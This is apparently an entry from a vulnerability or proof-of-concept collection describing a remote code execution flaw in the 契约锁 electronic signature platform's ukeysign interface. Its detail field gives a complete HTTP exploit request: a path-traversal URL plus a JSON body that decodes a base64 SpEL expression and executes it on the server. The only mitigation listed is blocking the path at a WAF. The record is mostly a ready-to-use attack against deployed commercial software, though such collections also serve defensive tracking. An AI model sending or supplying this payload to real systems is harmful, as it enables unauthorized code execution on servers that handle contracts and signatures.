vendor = "契约锁"
name = "契约锁电子签章平台ukeysign存在远程命令执行漏洞"
type = "RCE"
version = "未知"
path = "/contract/ukeysign/.%2e/.%2e/template/param/edits"
detail = "POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Content-Type: application/json {\"id\":\"2\",\"params\":[{\"expression\":\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编 码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF- 8');var c=a.parseExpression(deStr);c.getValue();\"}]}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
